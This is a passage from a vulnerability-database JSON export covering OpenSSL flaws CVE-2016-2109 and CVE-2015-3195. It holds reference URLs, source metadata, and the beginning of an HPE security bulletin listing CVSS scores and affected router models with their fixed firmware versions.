"http://www-01.ibm.com/support/docview.wss?uid=swg21984323" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21984483" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984583" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984609" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984794" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984920" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984977" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985736" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986068" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986123" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986152" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986260" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986473" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986506" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986563" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986564" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987671" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987779" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987968" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988055" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988071" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988189" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988350" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988383" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988976" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989046" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992493" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000192" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory20.asc" }, { "trust": 0.3, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.3, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.3, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2109" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2107" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2106" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2105" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2842" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-0799" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2108" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/399.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-2109" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2016:2073" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2959-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49332" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03756en_us" }, { "trust": 0.1, "url": "https://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-16:17/openssl-9.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-16:17/openssl-9.patc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-16:17/openssl-10.patch" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2105\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2106\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2176\u003e" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv/20160503.txt\u003e" }, { "trust": 0.1, "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:17.openssl.asc\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-16:17/openssl-10.patch.asc" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2109\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2107\u003e" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2183" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2107" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2178" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2176" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7052" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6304" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6305" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2106" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2108" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-7052" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.1, "url": "http://eprint.iacr.org/2016/594.pdf" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2177" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6306" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2107" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2176" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2108" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2105" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2106" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5387" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4393" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4396" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4537" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3739" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4395" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4542" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4538" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5385" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4070" }, { "trust": 0.1, "url": "https://www.hpe.com/us/en/product-catalog/detail/pip.344313.html\u003e" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4072" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4071" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4343" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4543" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4541" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4394" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4539" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4540" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5388" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4342" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03765en_us" }, { "trust": 0.1, "url": "http://h20565.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-a00006123en_" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0718" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4599" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4601" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4449" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4483" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4600" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1865" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4597" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4596" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4447" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1863" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4582" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4595" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1864" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9862" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4607" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4598" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1684" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4602" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht206900" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4594" }, { "trust": 0.1, "url": "https://issues.jboss.org/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3196" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3216" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0797" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-8176" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6808" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-core-services-apache-http-server/version-2.4.23/apache-http-server-2423-release-notes/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3196" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1839" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4483" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-8612" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1148" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0797" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3185" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3185" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3194" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1833" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=distributions\u0026version=2.4.23" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8176" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1836" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4449" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0286" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5420" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3627" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2012-1148" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1837" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1834" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1837" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1839" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5419" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4459" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0209" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0702" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1833" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1834" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4447" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-7141" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2109" }, { "db": "BID", "id": "87940" }, { "db": "JVNDB", "id": "JVNDB-2016-002476" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "136919" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136912" }, { "db": "PACKETSTORM", "id": "136958" }, { "db": "PACKETSTORM", "id": "136893" }, { "db": "PACKETSTORM", "id": "139379" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "CNNVD", "id": "CNNVD-201605-083" }, { "db": "NVD", "id": "CVE-2016-2109" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-2109" }, { "db": "BID", "id": "87940" }, { "db": "JVNDB", "id": "JVNDB-2016-002476" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "136919" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136912" }, { "db": "PACKETSTORM", "id": "136958" }, { "db": "PACKETSTORM", "id": "136893" }, { "db": "PACKETSTORM", "id": "139379" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "CNNVD", "id": "CNNVD-201605-083" }, { "db": "NVD", "id": "CVE-2016-2109" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-05-05T00:00:00", "db": "VULMON", "id": "CVE-2016-2109" }, { "date": "2016-04-26T00:00:00", "db": "BID", "id": "87940" }, { "date": "2016-05-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-002476" }, { "date": "2017-06-05T18:18:00", "db": "PACKETSTORM", "id": "142803" }, { "date": "2016-05-05T16:11:49", "db": "PACKETSTORM", "id": "136919" }, { "date": "2016-12-07T16:37:31", "db": "PACKETSTORM", "id": "140056" }, { "date": "2016-05-04T14:53:10", "db": "PACKETSTORM", "id": "136912" }, { "date": "2016-05-10T17:01:56", "db": "PACKETSTORM", "id": "136958" }, { "date": "2016-05-03T22:55:47", "db": "PACKETSTORM", "id": "136893" }, { "date": "2016-10-27T19:22:00", "db": "PACKETSTORM", "id": "139379" }, { "date": "2017-07-26T17:44:00", "db": "PACKETSTORM", "id": "143513" }, { "date": "2016-07-19T19:45:20", "db": "PACKETSTORM", "id": "137958" }, { "date": "2016-12-16T16:34:49", "db": "PACKETSTORM", "id": "140182" }, { "date": "2016-05-04T00:00:00", "db": "CNNVD", "id": "CNNVD-201605-083" }, { "date": "2016-05-05T01:59:05.357000", "db": "NVD", "id": "CVE-2016-2109" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-2109" }, { "date": "2017-05-02T01:10:00", "db": "BID", "id": "87940" }, { "date": "2017-10-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-002476" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201605-083" }, { "date": "2023-11-07T02:30:56.300000", "db": "NVD", "id": "CVE-2016-2109" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201605-083" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of ASN.1 BIO Implementation of crypto/asn1/a_d2i_fp.c of asn1_d2i_read_bio Service disruption in functions (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-002476" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201605-083" } ], "trust": 0.6 } }
var-201512-0484
Vulnerability from variot
The ASN1_TFLG_COMBINE implementation in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zh, 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1q, and 1.0.2 before 1.0.2e mishandles errors caused by malformed X509_ATTRIBUTE data, which allows remote attackers to obtain sensitive information from process memory by triggering a decoding failure in a PKCS#7 or CMS application. OpenSSL is an open source SSL implementation used to implement high-strength encryption of network communications.
OpenSSL's handling of X509_ATTRIBUTE has a security vulnerability. A remote attacker can use the vulnerability to send a message containing a special X509_ATTRIBUTE structure to trigger a memory leak. The attacker can obtain sensitive information. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. The vulnerability is due to the error caused by the program not correctly handling the malformed X509_ATTRIBUTE data. The following versions are affected: OpenSSL prior to 0.9.8zh, 1.0.0 prior to 1.0.0t, 1.0.1 prior to 1.0.1q, 1.0.2 prior to 1.0.2e. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05398322
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05398322 Version: 1
HPESBHF03709 rev.1 - HPE Network products including Comware, IMC, and VCX running OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2017-02-21 Last Updated: 2017-02-21
Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of Sensitive Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities with OpenSSL have been addressed for HPE Network products including Comware 5, Comware 7, IMC, and VCX. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS) or disclosure of sensitive information.
References:
- CVE-2015-1794 - Remote Denial of Service (DoS)
- CVE-2015-3193 - Remote disclosure of sensitive information
- CVE-2015-3194 - Remote Denial of Service (DoS)
- CVE-2015-3195 - Remote disclosure of sensitive information
- CVE-2015-3196 - Remote Denial of Service (DoS)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- Comware 5 (CW5) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- Comware 7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- HPE Intelligent Management Center (iMC) All versions - Please refer to the RESOLUTION below for a list of updated products.
- VCX Products All versions - Please refer to the RESOLUTION below for a list of updated products.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2015-1794
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2015-3193
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CVE-2015-3194
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2015-3195
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2015-3196
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following software updates to resolve the vulnerabilities in the Comware, IMC and VCX products running OpenSSL.
COMWARE 5 Products
- A6600 (Comware 5) - Version: R3303P28
- HP Network Products
- JC165A HP 6600 RPE-X1 Router Module
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JC566A HP 6600 RSE-X1 Router Main Processing Unit
- JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
- JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
- HSR6602 (Comware 5) - Version: R3303P28
- HP Network Products
- JC176A HP 6602 Router Chassis
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG355A HP 6600 MCP-X1 Router Main Processing Unit
- JG356A HP 6600 MCP-X2 Router Main Processing Unit
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
- HSR6800 (Comware 5) - Version: R3303P28
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
- MSR20 (Comware 5) - Version: R2516
- HP Network Products
- JD432A HP A-MSR20-21 Router
- JD662A HP MSR20-20 Router
- JD663A HP A-MSR20-21 Router
- JD663B HP MSR20-21 Router
- JD664A HP MSR20-40 Router
- JF228A HP MSR20-40 Router
- JF283A HP MSR20-20 Router
- MSR20-1X (Comware 5) - Version: R2516
- HP Network Products
- JD431A HP MSR20-10 Router
- JD667A HP MSR20-15 IW Multi-Service Router
- JD668A HP MSR20-13 Multi-Service Router
- JD669A HP MSR20-13 W Multi-Service Router
- JD670A HP MSR20-15 A Multi-Service Router
- JD671A HP MSR20-15 AW Multi-Service Router
- JD672A HP MSR20-15 I Multi-Service Router
- JD673A HP MSR20-11 Multi-Service Router
- JD674A HP MSR20-12 Multi-Service Router
- JD675A HP MSR20-12 W Multi-Service Router
- JD676A HP MSR20-12 T1 Multi-Service Router
- JF236A HP MSR20-15-I Router
- JF237A HP MSR20-15-A Router
- JF238A HP MSR20-15-I-W Router
- JF239A HP MSR20-11 Router
- JF240A HP MSR20-13 Router
- JF241A HP MSR20-12 Router
- JF806A HP MSR20-12-T Router
- JF807A HP MSR20-12-W Router
- JF808A HP MSR20-13-W Router
- JF809A HP MSR20-15-A-W Router
- JF817A HP MSR20-15 Router
- JG209A HP MSR20-12-T-W Router (NA)
- JG210A HP MSR20-13-W Router (NA)
- MSR 30 (Comware 5) - Version: R2516
- HP Network Products
- JD654A HP MSR30-60 POE Multi-Service Router
